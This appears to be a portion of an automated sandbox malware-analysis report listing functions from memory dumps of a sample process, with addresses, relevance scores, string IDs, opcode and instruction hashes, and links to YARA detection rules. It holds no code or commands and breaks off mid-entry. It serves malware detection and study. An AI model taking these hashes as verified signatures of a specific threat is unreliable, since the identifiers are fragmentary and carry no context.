                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC477000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC477000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac477000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: M_^$M_^$M_^
                • API String ID: 0-1076693546
                • Opcode ID: b5bead33b0d9be1f2a2d1558e3261b6342103d6fc61d2437da1a2f1fe6caf0cc
                • Instruction ID: d1e0b3ae9a3d11912a3345407fe8ff14156beff77ccff5232ee23fa30d4cd771
                • Opcode Fuzzy Hash: b5bead33b0d9be1f2a2d1558e3261b6342103d6fc61d2437da1a2f1fe6caf0cc
                • Instruction Fuzzy Hash: 11F1E77090992D8FEBA5EB18C899BE9B7F1FF69304F1045E9D00DE3291DA34A984CF44
                Function 00007FFAAC46F92A Relevance: 2.6, Strings: 2, Instructions: 116COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC46F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac46f000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: 4$k
                • API String ID: 0-4155231528
                • Opcode ID: edbdd88d21f36fb3d49a03542a7277efb92fe6acdbc10660aaf092241879962e
                • Instruction ID: 5e98354a026ae86dcbe1d1c9ed189b221abbc66ea172383a30bd52abb372d23f
                • Opcode Fuzzy Hash: edbdd88d21f36fb3d49a03542a7277efb92fe6acdbc10660aaf092241879962e
                • Instruction Fuzzy Hash: 11417CB1908A1D8FEBA8DF18CC95BA9B7B1EB45304F1041E9D14EE3291DE356E81CF45
                Function 00007FFAAC4719FB Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC471000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac471000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: .$/
                • API String ID: 0-2544594439
                • Opcode ID: 2b688e18cbd62a54faac71c48516c33ab1fc9fc7848781657979b84281fdcef7
                • Instruction ID: f31856e929a442ea14a33eeeb73861cff75ecc23658c3c40f2dde1d7c86d127c
                • Opcode Fuzzy Hash: 2b688e18cbd62a54faac71c48516c33ab1fc9fc7848781657979b84281fdcef7
                • Instruction Fuzzy Hash: FB11D470C0422DCBEB28DF54C8497EDB3B1BF55305F0185AAD00EA7281DB789A88DF94
                Function 00007FFAAC46ACC8 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC46A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac46a000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: 89
                • API String ID: 0-211841788
                • Opcode ID: 0a22000de102f07e823570944c72d14529d2530e3661a812176a11cedaeecb20
                • Instruction ID: 69a82b00b6ca6d64380ac6928424b1e8a6d25851bd4c820aaf2509602af90758
                • Opcode Fuzzy Hash: 0a22000de102f07e823570944c72d14529d2530e3661a812176a11cedaeecb20
                • Instruction Fuzzy Hash: A261FA70D0DA1D8FEB94EB98D8596FDB7B1EF5A304F50417AD00DE3295DE34A8448B88
                Function 00007FFAAC481D58 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: a6706dde522391549e9caf5b21408b3da4ffac3959d44e2b177e57a638bdabe1
                • Instruction ID: 46395ea9f38dfa709032180fad222f06846194978174e394eb409709be3cdf84
                • Opcode Fuzzy Hash: a6706dde522391549e9caf5b21408b3da4ffac3959d44e2b177e57a638bdabe1
                • Instruction Fuzzy Hash: A5514071D0964ECFEB49DB98C4596BDBBB1EF45304F1081BAD01EE7292CA34AA05CB94
                Function 00007FFAAC487CB8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 3a30c08e99274fa81f79280c4203466996cdb65e49f21b5d24b728428b6b408b
                • Instruction ID: 737e5b3dcde903c8efb97732e406f30304005393e5f46a26b0c04aac0eb2fb3c
                • Opcode Fuzzy Hash: 3a30c08e99274fa81f79280c4203466996cdb65e49f21b5d24b728428b6b408b
                • Instruction Fuzzy Hash: 79518571D0964ECFEB49DBA8C4695BDBBB1FF45304F10817AD01EE7292CA346A05CB94
                Function 00007FFAAC47DC3A Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: GX_H
                • API String ID: 0-805033
                • Opcode ID: 586696ed01c5676a9502a50c49dc68ea57bb356c621c05099775f081116e6f5c
                • Instruction ID: fd496ce4009d08dea104379ff1a884b7398c527443a35f04a073d3452fccc039
                • Opcode Fuzzy Hash: 586696ed01c5676a9502a50c49dc68ea57bb356c621c05099775f081116e6f5c
                • Instruction Fuzzy Hash: A1212462C2EBAECFFB11976498190F97F60FF47208F0480B6D04EDA1C2ED58A51883D5
                Function 00007FFAAC47DC95 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: GX_H
                • API String ID: 0-805033
                • Opcode ID: a10466f701a9d1c34eac8712aa2dcb8fc496473f11fa96273015a9839a7c299d
                • Instruction ID: 8f8224296c797e48ebc2c761e53a01fdd23921396f9f0a9b5d58dd59f9fb2b10
                • Opcode Fuzzy Hash: a10466f701a9d1c34eac8712aa2dcb8fc496473f11fa96273015a9839a7c299d
                • Instruction Fuzzy Hash: 6501DF72C28A1ECFEB448B24C8111FE7BB0FF4A304F0040B6D40AE7181EA29A8099790
                Function 00007FFAAC47196B Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC471000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac471000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: /
                • API String ID: 0-2043925204
                • Opcode ID: 0ad3c2ee3c25778cb50dd2f81501863dcfb389ffa1c8b66f0e0e91a171687a96
                • Instruction ID: 1eab6e775bf06f459fdac8e2d5b46c7d7493ff9ddd4478d1fb4940f49965a8cc
                • Opcode Fuzzy Hash: 0ad3c2ee3c25778cb50dd2f81501863dcfb389ffa1c8b66f0e0e91a171687a96
                • Instruction Fuzzy Hash: 4AF03C70D0922DCFEB28DF50C849AE973B1AF51311F0045BAE00E9B291DB789A88CB94
                Function 00007FFAAC46F4D9 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC46F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac46f000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: k
                • API String ID: 0-140662621
                • Opcode ID: 43e9faff130228e96a7bc956f2da5cfab35bbc856b13f9dff2b64b187445c8c7
                • Instruction ID: d7b1ea44e4cf697b1159e3643fc2a3a761c5ffa9539b19fba93e335d30b3f689
                • Opcode Fuzzy Hash: 43e9faff130228e96a7bc956f2da5cfab35bbc856b13f9dff2b64b187445c8c7
                • Instruction Fuzzy Hash: 6CF01C30A08A1DCFEBA4EF04C8547A8B7B6FB55345F1481A9D00DD32A4CB74AAC4CF48
                Function 00007FFAAC485C40 Relevance: .7, Instructions: 693COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6891b50aa254a26830af6a305765abb444427818bff0c2b77f5163460e5c23a3
                • Instruction ID: 0151c325aeb0107244938af8b89f5816bc32a08a74414f5cded69319c37809f8
                • Opcode Fuzzy Hash: 6891b50aa254a26830af6a305765abb444427818bff0c2b77f5163460e5c23a3
                • Instruction Fuzzy Hash: F1329434A19A19CFFB98DF18C899AB873E2FF55314F1081A9D01EC7292DE24ED45CB84
                Function 00007FFAAC48DD82 Relevance: .7, Instructions: 692COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e02860cb5a6ff411e95371df9117022843bd37f93e2cceaa305cbde039a765e4
                • Instruction ID: ae9c95b9564eacce957356bd6dae1016c6e1a5ce1410ceb5248e0f64f339b76b
                • Opcode Fuzzy Hash: e02860cb5a6ff411e95371df9117022843bd37f93e2cceaa305cbde039a765e4
                • Instruction Fuzzy Hash: B432B834A19A19CFEB98DB18C899A7877E2FF55314F1041B9D02EC7292DE24ED46CB84
                Function 00007FFAAC47EEA0 Relevance: .7, Instructions: 689COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0e65c93d16f25d18b71d2160648667433798c309255cba521fd3dc0f9a00ba44
                • Instruction ID: 347a24c8f8dfb16df1dcc20e7e1601f2e7dec15605e8a8130f31d3edd3278f23
                • Opcode Fuzzy Hash: 0e65c93d16f25d18b71d2160648667433798c309255cba521fd3dc0f9a00ba44
                • Instruction Fuzzy Hash: 0132A630A19A19CFFB98DB18C899A7877E2FF55314B5081B9D00EC7692DE35EC46CB84
                Function 00007FFAAC481FCF Relevance: .4, Instructions: 421COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 667fff01d16affb8b8b18783f3814bb31296a216aaa246515af80cbbd8a6a760
                • Instruction ID: 65fe492a6107207ff75aa3b9a6295a371e0543be7f61e7ba7e3235a2490b0283
                • Opcode Fuzzy Hash: 667fff01d16affb8b8b18783f3814bb31296a216aaa246515af80cbbd8a6a760
                • Instruction Fuzzy Hash: 57F1E030519656CFEB59CF18C4E46B53BA1FF56304B5081BDC85ECB28BCA38E986CB84
                Function 00007FFAAC483011 Relevance: .4, Instructions: 418COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c8576570eae06f2297150e0025aafa9558e797216f6bb9c5a238077ffe2c5fff
                • Instruction ID: 706b3e7e46cd2427fc81f591570c9ef7d315b43028b07c10df4c22bae0a78b52
                • Opcode Fuzzy Hash: c8576570eae06f2297150e0025aafa9558e797216f6bb9c5a238077ffe2c5fff
                • Instruction Fuzzy Hash: B1D1E23090EA468FE368DB2CD49957577E1FF46308B10897DC4AEC3682DE29F94A8785
                Function 00007FFAAC46D869 Relevance: .4, Instructions: 389COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC46A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac46a000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2b3a542b511a888d5caa4273f422000dfb4b15473e142617b70e69e77c669777
                • Instruction ID: 68b021576d309d630a90cd13414a74bd0a71344f45b1a3141d889b4e9828eb37
                • Opcode Fuzzy Hash: 2b3a542b511a888d5caa4273f422000dfb4b15473e142617b70e69e77c669777
                • Instruction Fuzzy Hash: 26E14C70D19A59CFEB98DB68C459BB8B7A1FF59304F0481BAD00ED7296CA34A844CF85
                Function 00007FFAAC460525 Relevance: .4, Instructions: 380COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac460000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49900d5495806bcbe814299733eb34bbb03206e09d3edf4131f7b46908415862
                • Instruction ID: b2d8fdc751a51b7bcd566e64c48110306845d46cd63f0e07bedbd45003ae1e1c
                • Opcode Fuzzy Hash: 49900d5495806bcbe814299733eb34bbb03206e09d3edf4131f7b46908415862
                • Instruction Fuzzy Hash: 49B15C47A8E6C18FF311677CA42A5F57F90DF92229B0881B7D18DCA19BDC04E88D47D9
                Function 00007FFAAC48D048 Relevance: .4, Instructions: 375COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 472b94151edd7edd37e98004984eb484bb8a906a722e7c3cfa4328d8d91e3797
                • Instruction ID: 93850bcbda888c4e2c43d3d819840fed1d783cb56ce589e4e55f6374acc4bbad
                • Opcode Fuzzy Hash: 472b94151edd7edd37e98004984eb484bb8a906a722e7c3cfa4328d8d91e3797
                • Instruction Fuzzy Hash: 93C1D2357688188FDB8CEB5CD495E6573E2EBA9740B1040A9F14FC72AADE34ED41CB81
                Function 00007FFAAC481882 Relevance: .3, Instructions: 331COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c2c4b70f53279877958e8ff3ed294b019829e3971a974db4419eb5ab3106e30a
                • Instruction ID: 8af61a143d064f1401a829d9872a8893837ea1341fcdc5fa1a8fdfcf19c3eef1
                • Opcode Fuzzy Hash: c2c4b70f53279877958e8ff3ed294b019829e3971a974db4419eb5ab3106e30a
                • Instruction Fuzzy Hash: 62C1D370A09A468FF749DB28C0946B4BBA1FF4A304F44817AC45EC7A97DB28F955C7C8
                Function 00007FFAAC4605A0 Relevance: .3, Instructions: 315COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac460000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6249968f57025d873af1a394eac9ddcd53ed34967d310964a47cc41f76834961
                • Instruction ID: f786b9c071f9a0a16d067e9870ed148293c1abf2632b77481740de1743e3e12c
                • Opcode Fuzzy Hash: 6249968f57025d873af1a394eac9ddcd53ed34967d310964a47cc41f76834961
                • Instruction Fuzzy Hash: 6F915B4698E6C18FF31163BCA81E5F5AF90DF92229B0C81B7D18DCA19BDC14D84D87DA
                Function 00007FFAAC4851B7 Relevance: .3, Instructions: 301COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 57d0af1fae3f92d75dd49cbba4b7c7285385aafd04683c0e8d88195c263b1156
                • Instruction ID: 115aa4b6ac0598b486cdbba152a521e1d27ff457c5ea78d8b35f2d1b3586150d
                • Opcode Fuzzy Hash: 57d0af1fae3f92d75dd49cbba4b7c7285385aafd04683c0e8d88195c263b1156
                • Instruction Fuzzy Hash: DC21AB12E4F1A3C7FA206B38B82D5F82B508F43626F1881B7D45E860D3CC0CAA4C53DA
                Function 00007FFAAC48784E Relevance: .3, Instructions: 297COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21eb3f0db510583e13eb488455eec97535b0256318fe71ea0f3f1a5de62197ef
                • Instruction ID: 6ce152b1558b443568102d75ba6b4054da298087e8fbcae676061fc912061861
                • Opcode Fuzzy Hash: 21eb3f0db510583e13eb488455eec97535b0256318fe71ea0f3f1a5de62197ef
                • Instruction Fuzzy Hash: 6EA1F33060DA46CFE749DB28C0A4AB0BBA1FF16304F5485B9D45EC7A86CB28F955CBD4
                Function 00007FFAAC461738 Relevance: .3, Instructions: 292COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac460000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 32bf2fde7006a20153be69237eb14fcc9c700baccd43d5872f69bf11b07d8c0c
                • Instruction ID: 5422cddc497bfd18bd0fb239d44378cd121397938612fbb452f37888b1ec415b
                • Opcode Fuzzy Hash: 32bf2fde7006a20153be69237eb14fcc9c700baccd43d5872f69bf11b07d8c0c
                • Instruction Fuzzy Hash: B891A331A1CA498FEB58DB1CC8556B9B7E2FF99314B14457AE44EC328ACE34EC0687C5
                Function 00007FFAAC46060D Relevance: .3, Instructions: 291COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac460000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41602f99469769042f934efe0b8f9dc5ce58f51a7a08b2fe3e9592c7e39d97f5
                • Instruction ID: 9a410cc385674370986a9d95e0dda22ed3ae4a0ee11c904a32e929a29220ac7a
                • Opcode Fuzzy Hash: 41602f99469769042f934efe0b8f9dc5ce58f51a7a08b2fe3e9592c7e39d97f5
                • Instruction Fuzzy Hash: C4814C4698E7C18FF21163BCA41E5F5AF90DF92228B0881B7D18D8A19FDC14D84D87DA
                Function 00007FFAAC460638 Relevance: .3, Instructions: 288COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac460000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ddb082fdc0effa4907f00436c39706ac800980e410c9c3061a85e5abbba27e85
                • Instruction ID: 60071755b694b5c48a1307d32ef2a6aed54de2d2f8a86e80eec9cea43d264ab9
                • Opcode Fuzzy Hash: ddb082fdc0effa4907f00436c39706ac800980e410c9c3061a85e5abbba27e85
                • Instruction Fuzzy Hash: 2081394694E6C18FF311636CA41D5F5AF90EF92229B0881B7D04DCA19FDC14D84D87D9
                Function 00007FFAAC486D06 Relevance: .3, Instructions: 274COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: edf7432bb23d7c7e3a1162bc4bc370cc95e208301079a4f2384b5739c5b06658
                • Instruction ID: 223912a729868a3bb426a856f007300edd4c1fc76493ec70d3897c24dfb7b584
                • Opcode Fuzzy Hash: edf7432bb23d7c7e3a1162bc4bc370cc95e208301079a4f2384b5739c5b06658
                • Instruction Fuzzy Hash: D3814A3590E6428FF3A98B28D44A5F977E1EF86314F14857ED09FC3282DA28F90687D5
                Function 00007FFAAC460640 Relevance: .3, Instructions: 266COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac460000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99f81c548425836049aa88206ef86783d0c45d66d0d4af1822fa4f2d97569cf3
                • Instruction ID: 9abdf59c296853c0ea7062fe78a2ed017ad45cb9f1bd905600ad2b39bddc17fd
                • Opcode Fuzzy Hash: 99f81c548425836049aa88206ef86783d0c45d66d0d4af1822fa4f2d97569cf3
                • Instruction Fuzzy Hash: DF713B8698E7C18FF21153BCA41E5F5AF90EF52229B0881B7D18D8A19FDC14D84D87DA
                Function 00007FFAAC480DC6 Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ffe219341cf6a98490c8917494eb732668d41e809f83dd0e98cc5447d01f308b
                • Instruction ID: 756041b616dfd2b4597d4e53fc06f8d7fcee9c713a57024f6e208e05c8b31871
                • Opcode Fuzzy Hash: ffe219341cf6a98490c8917494eb732668d41e809f83dd0e98cc5447d01f308b
                • Instruction Fuzzy Hash: 4381593192EA428FF3684B28A4495757BE0EF46318B14C57ED49FC3183DE28F90A87D9
                Function 00007FFAAC484E69 Relevance: .3, Instructions: 257COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fcb962102768411d50fb724ff7c6c7739192055ce9e7d68b356beafefd22058b
                • Instruction ID: 099bba822c57492a34eaa82552aee15f17bd5f8203b0859891ad2e1962958eb2
                • Opcode Fuzzy Hash: fcb962102768411d50fb724ff7c6c7739192055ce9e7d68b356beafefd22058b
                • Instruction Fuzzy Hash: 4E714A3190E449CFF769DB28842A6B437C0FF46318B1052BDD66EC7592DD28EA1E87C5
                Function 00007FFAAC488F71 Relevance: .3, Instructions: 256COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b5d6371638f50534b22afa1f3a5d6d2c9aca619274fba202b0263f5b6d75f71f
                • Instruction ID: 2383558a34ffe698e9dda8d58ef57d49d0999c14373df07ab21fda0167d219e2
                • Opcode Fuzzy Hash: b5d6371638f50534b22afa1f3a5d6d2c9aca619274fba202b0263f5b6d75f71f
                • Instruction Fuzzy Hash: C791D03090EB06CFF369DB14D19957177E1FF16308B10897DC4AE87A92CA29F946C789
                Function 00007FFAAC48A707 Relevance: .3, Instructions: 252COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 42b874ca6a9264b5976e9ee2483a6db7175ce67dfac74a240ab2ec6e6c6f44cc
                • Instruction ID: afe9573c2ebc3c40f3e7f5dfe019939cd577102c6390df62ef55647488024679
                • Opcode Fuzzy Hash: 42b874ca6a9264b5976e9ee2483a6db7175ce67dfac74a240ab2ec6e6c6f44cc
                • Instruction Fuzzy Hash: BC71233190E649CFF768DB18881E5B837D0EF46318B0482B9D46ED3592DE58EA0F87D5
                Function 00007FFAAC485A2B Relevance: .2, Instructions: 247COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80dd2f2ac4e0dcf3d5c8d17bdee1422ecdc436739645b3af56a60a9b24379e33
                • Instruction ID: 22a148c4da0ca99abaf7d0fa6d18738836135c01d1d2de5edfb07fed1f2804ee
                • Opcode Fuzzy Hash: 80dd2f2ac4e0dcf3d5c8d17bdee1422ecdc436739645b3af56a60a9b24379e33
                • Instruction Fuzzy Hash: 3281E13091E64ACFFB95DF68C8986BC7BA1EF56304F1045BAD01ED7182DE28A9498784
                Function 00007FFAAC47DF81 Relevance: .2, Instructions: 244COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac47d000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
